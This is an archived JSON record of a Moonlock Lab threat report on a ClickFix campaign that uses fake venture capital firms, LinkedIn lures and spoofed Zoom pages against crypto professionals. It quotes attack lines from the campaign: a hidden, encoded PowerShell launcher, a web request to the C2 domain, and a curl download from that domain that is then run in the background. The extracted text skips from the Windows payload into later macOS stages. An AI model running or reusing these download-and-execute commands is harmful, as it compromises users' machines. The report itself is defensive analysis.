{
	"id": "e1477e60-b4ae-4e19-ad0b-d07bf4abc9f3",
	"created_at": "2026-04-23T02:54:27.304759Z",
	"updated_at": "2026-04-25T02:18:49.520118Z",
	"deleted_at": null,
	"sha1_hash": "0633e2a0a8762adc0e2ef68dcc19d720a1701467",
	"title": "Fake VCs target crypto talent",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10725566,
	"plain_text": "Fake VCs target crypto talent\r\nBy Moonlock Lab Team\r\nPublished: 2026-03-02 · Archived: 2026-04-23 02:38:38 UTC\r\nIn a new investigation, Moonlock Lab has been tracking a malware campaign targeting cryptocurrency and Web3\r\nprofessionals. The threat actors operate through fabricated venture capital identities, engage victims on LinkedIn with\r\ntailored job or partnership offers, and funnel them toward spoofed video conferencing links—fake Zoom and Google Meet\r\npages—that serve as the delivery mechanisms for malicious payloads.\r\nWhat makes this campaign noteworthy is the convergence of several trends in modern threat operations: advanced social\r\nengineering, cross-platform payload delivery, and the adoption of the ClickFix technique, a method that weaponizes user\r\ntrust by disguising malicious command execution as a routine browser verification step.\r\nMoonlock Lab presents its full investigation, along with practical recommendations to help people protect themselves from\r\nthe attack.\r\nKey findings\r\nHere’s a rundown of the full findings we’ll be discussing in this report:\r\nA coordinated malware campaign is targeting cryptocurrency professionals through LinkedIn social engineering, fake\r\nventure capital firms, and fraudulent video conferencing links. \r\nThe attack chain culminates in a ClickFix-style fake CAPTCHA page that tricks victims into executing clipboard-injected commands in their Terminal.\r\nThe campaign is cross-platform by design, delivering tailored payloads for both macOS and Windows.\r\nWHOIS data links the malicious infrastructure to a single registrant: Anatolli Bigdasch (Boston, Massachusetts), who\r\nis connected to the fictitious company SolidBit Capital. 
This is the same entity whose “co-founder,” Mykhailo\r\nHureiev, was reported by a victim on X (formerly Twitter) for conducting recruiter scam operations on LinkedIn.\r\nRelated macOS samples analyzed by Moonlock Lab reveal fully undetectable (FUD) Mach-O binaries that download\r\nnext-stage payloads for lateral infection.\r\nNewly registered infrastructure, including the domain lumax[.]capital, suggests that threat actors are actively building\r\nthe next iteration of their campaign with a fresh fake company identity.\r\nBehavioral and operational indicators are consistent with tactics previously attributed to DPRK-aligned threat actors\r\ntargeting the cryptocurrency sector, though definitive attribution remains open.\r\nThe campaign shares tactical and infrastructure overlaps with activity attributed by Mandiant to UNC1069, a\r\nfinancially motivated DPRK threat actor tracked since 2018, including near-identical fake Zoom domain naming\r\nconventions (zoom[.]us07-web[.]us vs. Mandiant’s zoom[.]uswe05[.]us), Calendly-to-fake-Zoom social engineering\r\nflows, and cross-platform ClickFix delivery.\r\nThe campaign begins on LinkedIn, where an operator using the persona Mykhailo Hureiev, listed as “Co-Founder \u0026\r\nManaging Partner” at SolidBit Capital, contacts targets with personalized messages. The approach follows a consistent\r\npattern:\r\n1. Flattery and context-setting. The initial message references the target’s public work, community engagement, or\r\nprofessional visibility. In a documented case, Hureiev wrote: “Recently I’ve been following [project name] and its\r\nRWA-focused ecosystem, and your work around KOL and community engagement has been quite visible.”\r\n2. Role framing. The operator presents SolidBit as a Web3 and DeFi-focused fund that works with “portfolio teams and\r\necosystem partners across growth, community, and narrative-building initiatives.”\r\n3. Urgency toward external links. 
The conversation quickly pivots to scheduling a call. The operator shares a\r\nCalendly link, calendly[.]com/hureivemykhail/with-solidbit-meeting, that is configured to redirect the victim to a\r\nfake Zoom meeting link.\r\nThis social engineering flow was publicly documented on January 9, 2026, by a user on X (handle @0xbigdan), who posted\r\na warning about the scam with screenshots of the full LinkedIn conversation. The victim noted several red flags: the use of\r\nlookalike domains, the urgency to follow external links, and a telling behavioral detail—when the victim invited Hureiev to\r\ntheir own Google Meet instead, the operator joined the call, stayed silent, and then disconnected. The account was blocked\r\nshortly after.\r\nhttps://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign\r\nPage 1 of 15\n\nInfrastructure: Domains, registrants, and fake companies\r\nThe infrastructure behind this campaign is well-structured and built to rotate identities when one front becomes exposed.\r\nMoonlock Lab has managed to trace how seemingly separate companies are connected and determine that one name sits at\r\nthe center of it all.\r\nDomain registration and the Bigdasch connection\r\nThis is where the OSINT gets interesting. We pulled WHOIS records for the malicious domains and found that they all point\r\nto the same registrant, shown below.\r\nField | Value\r\nRegistrant Name | Anatolli Bigdasch\r\nLocation | Boston, MA, US\r\nPhone | +1.3542438756\r\nEmail | anatollibigdasch0717[at]gmail[.]com\r\nA search for “Anatolli Bigdasch” returns a private LinkedIn profile associated with the same individual.
\r\nNotably, this profile identifies Bigdasch as the founder of SolidBit Capital, the same entity that Mykhailo Hureiev claims to\r\nrepresent when engaging victims on LinkedIn.\r\nWhether “Anatolli Bigdasch” is a real person, a stolen identity, or a fully fabricated persona cannot be conclusively\r\ndetermined from available data. What is clear is that this identity serves as the administrative anchor for the campaign’s\r\ndomain infrastructure.\r\nThe rotating company fronts: SolidBit, MegaBit, and Lumax Capital\r\nA defining characteristic of this campaign is the operators’ investment in fabricated company identities—not just single-purpose phishing pages but fully built-out corporate facades designed to stand up to the scrutiny of a victim’s due diligence\r\ncheck.\r\nSolidBit Capital is the identity tied to the Bigdasch registrant and the Mykhailo Hureiev LinkedIn persona. But SolidBit\r\nisn’t the only fake company in this operation. MegaBit is an additional fake company discovered on the campaign\r\ninfrastructure. Hosted on the fake Zoom domain at zoom[.]07usweb[.]us/homepage/, the site presents itself as an investment\r\nfirm with a polished dark-themed frontend, navigation tabs (Portfolio, About Us, Focus, Team, Contact Us, and Login), and\r\nan “Investment Team” page featuring four individuals, all displayed with AI-generated headshot photos. The domain variant\r\n(07usweb[.]us vs. us07-web[.]us) confirms that this is the same operator rotating infrastructure identifiers while reusing the\r\ncore naming pattern.\r\nThe name “MegaBit” itself follows the same convention as “SolidBit.” Both use the “-Bit” suffix commonly associated with\r\ncryptocurrency and blockchain ventures, suggesting a deliberate branding pattern designed to resonate with targets in the\r\ncrypto space.\r\nLumax Capital represents the newest iteration, as described below.\r\nVirusTotal pivoting: Lumax Capital\r\nPivoting through VirusTotal on the IP address associated with the known malicious domains revealed a newly registered\r\ndomain: lumax[.]capital, registered on February 2, 2026.\r\nAt the time of this analysis, the Lumax Capital website was live and fully functional. It included a polished frontend with\r\nworking navigation, multiple tabs, and a fabricated company history claiming operations since 2018 (contradicted by the\r\ndomain’s registration date of just days prior).\r\nThe “Leadership” page features AI-generated headshot photos of supposed team members—including “Anna Fernanda,”\r\n“Vladyslav Bystrov,” and others—with fabricated credentials from institutions like Stanford and MBA programs.\r\nThe site also includes a Research section with article entries backdated to December 2025. However, clicking any of these\r\nentries displays a “Coming soon” placeholder, confirming they are cosmetic stubs designed to build perceived legitimacy for\r\nvisitors who land on the site after an initial LinkedIn interaction.\r\nThis infrastructure strongly suggests that the threat actors are actively preparing Lumax Capital as the next front company in\r\ntheir campaign rotation, likely anticipating that the SolidBit Capital identities are compromised.\r\nThe ClickFix delivery mechanism\r\nThe ClickFix social engineering technique, sometimes referred to as “living-off-the-user,” has gained popularity among\r\nthreat actors throughout 2025–2026. Unlike traditional drive-by downloads or exploit kits, ClickFix attacks require the\r\nvictim to manually execute the malicious payload themselves, thus bypassing security tools.\r\nThe technique typically presents the victim with a fake browser verification (Cloudflare CAPTCHA, a “Verify you are\r\nhuman” prompt, etc.) that secretly copies a malicious command to the clipboard and then provides step-by-step visual\r\ninstructions for the user to paste and execute it in their system terminal.\r\nImplementation in this campaign\r\nWhen a victim clicks the fake Zoom or Google Meet link provided by the LinkedIn operator, they are directed to a page that\r\nappears to be a legitimate event website—in this case, “The Digital Asset Conference III,” referencing a real\r\ncryptocurrency event, and “Hedgeweek,” a well-established hedge fund industry news portal widely read by institutional\r\ninvestors, fund managers, and allocators. Moonlock Lab reached out to Hedgeweek to notify them of the typosquat domain\r\nabusing their brand, but did not receive a response at the time of publication.\r\nThe attackers overlay this page with a fake Cloudflare-branded verification modal.\r\nThe attack flow proceeds as follows.\r\nStep 1: Fake CAPTCHA. The page displays a familiar “I’m not a robot” checkbox with Cloudflare branding. This isn’t a\r\nreal Cloudflare challenge, however. There are no cf-chl-* tokens and no legitimate JavaScript challenge. In fact, the entire\r\ninterface is locally rendered HTML/CSS.\r\nStep 2: Clipboard poisoning. The moment the user clicks the checkbox, the page’s JavaScript silently writes a malicious\r\ncommand to the user’s clipboard using navigator.clipboard.writeText(). The command is OS-specific. The script detects the\r\noperating system via the User-Agent string and selects the appropriate payload.\r\nStep 3: Guided terminal execution. After the checkbox animation completes, the page transitions to a second modal, styled\r\nto match either Windows 11 or macOS aesthetics, that instructs the user to open their terminal and paste the clipboard\r\ncontents. This modal includes:\r\nA countdown timer to create artificial urgency\r\nAnimated step-by-step cursor demonstrations to show exactly how to open the terminal, right-click to paste, and\r\npress Enter\r\nA confirmation checkbox (“Perform the steps above to finish verification”) to provide psychological reinforcement—\r\nthe user affirms they have completed the steps, normalizing the action\r\nA “Verify” button that, once clicked, redirects to the real conference website (thedigitalassetconference.com),\r\ncreating the illusion that the verification was legitimate\r\nThe sophistication of these social engineering tactics is worth emphasizing. The attackers have invested in realistic OS-specific UI elements, cursor animations, and psychological pressure mechanics. The user genuinely believes they are\r\ncompleting a security verification to access a conference page, when they are, in fact, executing a remote payload loader on\r\ntheir own machine.\r\nPayload analysis\r\nPayloads are adaptive and designed to deliver convincing phishing messages tailored to users’ systems. By separating\r\ndelivery logic for Windows and macOS, threat actors ensure an interface that appears native to the victim’s environment,\r\nreducing friction and suspicion.\r\nWindows payload\r\nWhen the victim’s system is detected as Windows, the clipboard receives a PowerShell command:\r\npowershell -w h -nop -eC \u003cbase64\u003e\r\nThe flags are significant: -w h hides the PowerShell window, -nop bypasses execution policies, and -eC executes a Base64-encoded command.\r\nAfter decoding, the payload performs an in-memory web request:\r\n$x=New-Object -COM Microsoft.XMLHTTP\n\n$x.open('GET','https://hedgeweeks[.]online/ft?id=',$false)\n\nStage 3: Payload download. Using curl with a macOS-specific User-Agent header (“User-Agent: macintosh”), the script\r\ndownloads a Python file from the same C2 domain:\r\ncurl -H \"User-Agent: macintosh\" \"https://hedgeweeks[.]online/ft?id=\u003cencoded_id\u003e\" \u003e /tmp/hduwhv.py\r\nStage 4: Execution and persistence. The downloaded Python script is executed with python3 /tmp/hduwhv.py, piped into\r\nnohup bash \u0026 to ensure that it continues running even if the terminal window is closed.\r\nMoonlock Lab’s analysis extends beyond the ClickFix delivery vector to examine related macOS binaries associated with\r\nthe broader campaign. 
This work builds on an initial discovery by @malwrhunterteam and @L0Psec, who identified\r\nmalware masquerading as a Zoom client.\r\nA fake Zoom app\r\nThe original sample (SHA-256: 755cc133ae0519accbcfdd5f8f0d9fe1aa08cbcb306c3e5f29ebcb6ac12d9323), first shared by\r\n@malwrhunterteam and analyzed by @L0Psec, is a macOS application written in Swift that impersonates Zoom. Here’s\r\nhow it works.\r\nCredential harvesting via SwiftUI. Unlike less sophisticated infostealers that rely on osascript dialogs, this sample uses\r\nSwiftUI APIs to present a convincingly secure password prompt—a SecureTextField within a native-looking dialog that\r\nclosely mimics a legitimate Zoom authentication request. The visual fidelity is advanced enough that even a cautious user\r\nmight not immediately distinguish it from a real system prompt. A small detail caught @L0Psec’s attention: The app even\r\nshakes the window when an incorrect password is entered, replicating standard macOS input error behavior.\r\nTelegram bot exfiltration. Captured credentials are exfiltrated to a Telegram bot.\r\nHosted multi-platform payload repository. The domain zoom[.]us05-web[.]us served as a payload hosting server, with\r\ndifferent files accessible via a numbered parameter: https://zoom[.]us05-web[.]us/ft?topic=s\u0026gt=\u003cnumber\u003e. Different\r\nnumbers returned different payloads. This design allows the operators to serve platform-specific or stage-specific files from\r\na single endpoint. 
Files retrieved from this URL included:\r\nAdditional macOS applications (ZIP archives)\r\nA Python script\r\nAn ELF binary\r\nA VBScript file\r\nThe presence of macOS apps, a Python script, an ELF binary, and a VBScript file all served from the same infrastructure\r\nunderscores a key characteristic of this campaign: It is cross-platform by design, with ready-made tooling for macOS,\r\nWindows, and Linux environments.\r\nFully undetectable (FUD) next-stage payloads\r\nMoonlock Lab continued its analysis with 2 additional Mach-O binaries linked to this exact campaign, which were shared by\r\n@malwrhunterteam as related to fake Zoom domains.\r\nProperty | Obfuscated version | Non-obfuscated version\r\nSHA-256 | 9a778d2b7919717e95072e4dec01c815a5fd81f574b538107652d73d8dc874b6 | 2fbd34eed9dbf57a44cf1540941fb43a793be27e13\r\nFile size | 9.3 MB | 37.6 KB\r\nBoth samples perform the same core functions: retrieving a temporary directory path, downloading files from a remote\r\nserver, re-signing them with ad-hoc code signatures, and executing them. The critical difference is in their construction.\r\nThe obfuscated version (9.3 MB) is inflated with garbage instructions distributed across 2 binary segments. This junk code\r\nis designed to thwart static analysis tools—disassemblers like Ghidra struggle to process the binary efficiently, making quick\r\ntriage impractical.\r\nThe non-obfuscated version (37.6 KB) contains the same functional logic without the padding. It appears to be either a\r\ndevelopment build or an earlier iteration of the payload.\r\nWhy both versions were uploaded to VirusTotal remains unclear. Both achieved zero detections across all vendors for an\r\nextended period after submission, demonstrating that the threat actors have invested in evasion techniques that effectively\r\nbypass current static analysis heuristics.\r\nThoughts on attribution: The UNC1069/DPRK connection\r\nOn February 9, 2026, Mandiant published detailed findings on an intrusion attributed to UNC1069, a financially motivated\r\nthreat actor with a suspected DPRK nexus, tracked since 2018. The intrusion targeted a FinTech entity in the cryptocurrency\r\nsector and involved the deployment of 7 malware families, including the known DPRK-associated downloader\r\nSUGARLOADER and 6 newly identified families: WAVESHAPER, HYPERCALL, HIDDENCALL, SILENCELIFT,\r\nDEEPBREATH, and CHROMEPUSH.\r\nThe operational parallels with the campaign documented in this article are striking.\r\nElement | This campaign | Mandiant’s UNC1069 case\r\nFake Zoom domain | zoom[.]us07-web[.]us | zoom[.]uswe05[.]us\r\nDomain naming pattern | zoom.us{XX}-web.us | zoom.uswe{XX}.us\r\nSocial engineering flow | LinkedIn → Calendly → fake Zoom | Telegram (compromised account) → Calendly → fake Zoom\r\nDelivery technique | ClickFix (fake Cloudflare CAPTCHA) | ClickFix (fake audio troubleshooting)\r\nOS targeting | macOS + Windows | macOS + Windows\r\nTarget sector | Crypto/Web3 professionals | Crypto startups, software developers\r\nFake company fronts | SolidBit Capital, MegaBit, Lumax Capital | Compromised executive identity\r\nDifferences in ClickFix implementation\r\nWhile both campaigns use the ClickFix technique, the social engineering wrapper differs. In the campaign documented here,\r\nthe attackers use a fake Cloudflare CAPTCHA overlaid on a spoofed conference page, with animated terminal instructions\r\nguiding the user to paste clipboard-injected commands. In Mandiant’s case, the fake Zoom call presented a deepfake video\r\nof a known CEO and used a simulated “audio issue” to justify the victim running “troubleshooting” commands.\r\nThe Mandiant case is arguably more sophisticated in its ClickFix framing. The troubleshooting commands include\r\nlegitimate system profiler calls (system_profiler SPAudioData, pnputil /enum-devices) alongside the malicious payload\r\ndownload, making the overall command block appear more plausible to a technically literate victim.\r\nThe campaign we analyzed relies more heavily on the trust established by the Cloudflare brand and the familiarity of the\r\nCAPTCHA interaction. Both approaches, however, share the same core mechanic: tricking the user into pasting and\r\nexecuting attacker-controlled commands in their own terminal.\r\nRecommendations\r\nAs is often the case with social engineering, a few minutes spent on verification can prevent serious damage. When\r\ncontacted on LinkedIn about job opportunities, partnerships, or investment discussions from unfamiliar accounts, slow the\r\ninteraction down and take your time to verify everything.\r\nHere are the steps you should take to stay safe:\r\nVerify the company. Check when the domain was registered, review the company’s digital footprint, and look\r\nclosely at team photos or biographies that may be AI-generated or recently fabricated.\r\nBe cautious if a conversation quickly moves off of LinkedIn. If the sender insists on using their Zoom, Calendly,\r\nor Google Meet, run those external links through a URL checking tool.\r\nTreat urgency as a red flag. Pressure to schedule quickly, move to private channels, or follow specific technical\r\ninstructions to change settings on your device is often a key part of the manipulation.\r\nNever paste commands into your terminal. 
No legitimate service will require you to open your terminal and run a\r\ncommand as part of a verification process.\r\nThe rule of thumb is to pause before doing anything you don’t fully understand. If a step feels unusual for a job interview, a\r\npartnership call, or an investment discussion, it probably is.\r\nConclusion\r\nA threat actor has built what amounts to an entire corporate ecosystem that doesn’t exist, including fake companies (SolidBit\r\nCapital, MegaBit, Lumax Capital), fake teams (including AI-generated headshots and bios), fabricated company histories,\r\nfunctional websites, LinkedIn personas that send thoughtful, personalized messages, Calendly links that feel routine, and\r\nZoom domains that seem legitimate at a quick glance.\r\nEvery layer is designed to survive additional scrutiny. And for many victims, that’s all it takes.\r\nThe ClickFix technique is what makes the final step so effective. By turning the victim into the execution mechanism—\r\nhaving them paste and run the command themselves—the attackers sidestep the very controls the security industry has spent\r\nyears building. No exploit. No suspicious download. Just a human doing what a website told them to do, because every\r\nsignal up to that point seems to indicate that it was safe.\r\nAt Moonlock Lab, tracking campaigns like this is at the core of what we do. Our focus on macOS threats means we often\r\ncatch things early. This research, for example, started with a single sample and expanded into a full campaign map.\r\nBut research alone doesn’t protect your Mac. That’s why our findings feed directly into the Moonlock app — real-time\r\nprotection built by the same team that tracks these threats. Moonlock’s malware database is updated with detections for\r\nemerging threats like the ones documented in this article. \r\nWe’ll keep watching this one. The domains will change. The company names will change. 
But the playbook has been\r\nwritten, and that makes it harder to hide.\r\nIf you believe you have been targeted by this campaign, if you’ve been contacted by someone from similar fake companies\r\nlike SolidBit Capital, MegaBit, or Lumax Capital, or if you’ve encountered a “verification” page that asked you to open\r\nyour terminal, share your experience with the Moonlock team on X or via email. Help us burn this infrastructure down\r\nfaster than the attackers can rebuild it.\r\nIndicators of compromise (IOCs)\r\nNetwork indicators\r\nType | Value | Context\r\nDomain | zoom[.]us07-web[.]us | Fake Zoom page, hosts ClickFix payload\r\nDomain | zoom[.]07usweb[.]us | Fake Zoom page, hosts MegaBit fake company site\r\nDomain | zoom[.]us05-web[.]us | Fake Zoom page, multi-platform payload server\r\nDomain | goog1e[.]us-meet[.]com | Fake Google Meet page\r\nDomain | hedgeweeks[.]online | C2 server; typosquat of Hedgeweek (hedgeweek.com)\r\nDomain | lumax[.]capital | New campaign infrastructure (registered 2026-02-02)\r\nURL | calendly[.]com/hureivemykhail/with-solidbit-meeting | Calendly link used in social engineering\r\nFile indicators\r\nSHA-256 | Description\r\n755cc133ae0519accbcfdd5f8f0d9fe1aa08cbcb306c3e5f29ebcb6ac12d9323 | Fake Zoom macOS application\r\n9a778d2b7919717e95072e4dec01c815a5fd81f574b538107652d73d8dc874b6 | Obfuscated Mach-O next-stage loader (9.3 MB)\r\n2fbd34eed9dbf57a44cf1540941fb43a793be27e13e937299167b2b67cb84d6b | Non-obfuscated Mach-O next-stage loader (37.6 KB)\r\nRegistrant information\r\nField | Value\r\nName | Anatolli Bigdasch\r\nLocation | Boston, MA, US\r\nEmail | anatollibigdasch0717[at]gmail[.]com\r\nPhone | +1.3542438756\r\nPersona | Platform | Role claimed\r\nMykhailo Hureiev | LinkedIn | Co-Founder \u0026 Managing Partner, SolidBit Capital\r\nAnatolli Bigdasch | LinkedIn | Founder, SolidBit Capital\r\nRelated UNC1069 infrastructure (from Mandiant)\r\nThe following indicators were published by Mandiant in their UNC1069 report and are included here for cross-reference, as\r\nthey share operational patterns with the infrastructure documented in this article:\r\nType | Value | Context\r\nDomain | zoom[.]uswe05[.]us | Fake Zoom meeting (note naming pattern similarity to zoom[.]us07-web[.]us)\r\nDomain | mylingocoin[.]com | Hosted initial payload\r\nDomain | breakdream[.]com | SUGARLOADER C2\r\nDomain | dreamdie[.]com | SUGARLOADER C2\r\nDomain | support-zoom[.]us | SILENCELIFT C2\r\nDomain | supportzm[.]com | HYPERCALL C2\r\nDomain | zmsupport[.]com | HYPERCALL C2\r\nDomain | cmailer[.]pro | CHROMEPUSH upload server\r\nThis is an independent publication, and it has not been authorized, sponsored, or otherwise approved by Apple Inc.\r\nMicrosoft Windows is a trademark of Microsoft Corporation. Mac and macOS are trademarks of Apple Inc.\r\nMoonlock Lab Team\r\nMoonlock Lab is a team of malware researchers and reverse engineers, whose expertise is at the core of Moonlock's\r\ncybersecurity products. Moonlock is the cybersecurity division of MacPaw.\r\nSource: https://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://moonlock.com/fake-vcs-target-crypto-talent-clickfix-campaign"
	],
	"report_names": [
		"fake-vcs-target-crypto-talent-clickfix-campaign"
	],
	"threat_actors": [
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-25T02:00:03.362702Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "dcbff54d-13ec-40b5-b3b9-b74a315669e1",
			"created_at": "2026-02-03T02:00:03.428641Z",
			"updated_at": "2026-04-25T02:00:03.739279Z",
			"deleted_at": null,
			"main_name": "UNC1069",
			"aliases": [
				"MASAN",
				"CryptoCore"
			],
			"source_name": "MISPGALAXY:UNC1069",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1776912867,
	"ts_updated_at": 1777083529,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0633e2a0a8762adc0e2ef68dcc19d720a1701467.pdf",
		"text": "https://archive.orkl.eu/0633e2a0a8762adc0e2ef68dcc19d720a1701467.txt",
		"img": "https://archive.orkl.eu/0633e2a0a8762adc0e2ef68dcc19d720a1701467.jpg"
	}
}